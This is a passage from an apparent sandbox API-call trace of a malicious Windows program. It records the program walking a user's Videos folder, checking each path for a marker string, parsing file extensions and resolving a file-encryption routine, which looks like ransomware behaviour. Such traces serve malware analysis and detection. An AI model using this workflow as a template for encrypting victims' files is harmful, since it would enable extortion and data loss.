| out: hHeap=0x8a0000) returned 1 [0194.627] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.627] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.627] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.627] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f5e8260, ftCreationTime.dwHighDateTime=0x1d5dd9d, ftLastAccessTime.dwLowDateTime=0x7011bde0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0x7011bde0, ftLastWriteTime.dwHighDateTime=0x1d5e2d5, nFileSizeHigh=0x0, nFileSizeLow=0xf4b5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="4Us08VSplrH Ofh79JeB.mkv", cAlternateFileName="4US08V~1.MKV")) returned 0x90add8 [0194.627] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0194.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0194.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0194.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0194.627] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.627] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f5e8260, ftCreationTime.dwHighDateTime=0x1d5dd9d, ftLastAccessTime.dwLowDateTime=0x7011bde0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0x7011bde0, ftLastWriteTime.dwHighDateTime=0x1d5e2d5, nFileSizeHigh=0x0, nFileSizeLow=0xf4b5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="4Us08VSplrH Ofh79JeB.mkv", cAlternateFileName="4US08V~1.MKV")) returned 0x90add8 [0194.627] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0194.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0194.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0194.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0194.628] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HX538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="538Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="38Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ki1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Us08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="08VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VSplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SplrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="plrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lrH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rH Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ofh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fh79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="79JeB.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0194.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0194.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0194.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0194.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0194.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0194.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0194.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0194.631] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.631] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0194.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0194.632] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0194.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0194.632] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0194.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0194.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0194.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0194.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0194.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0194.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0194.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0194.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0194.632] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.632] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.632] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 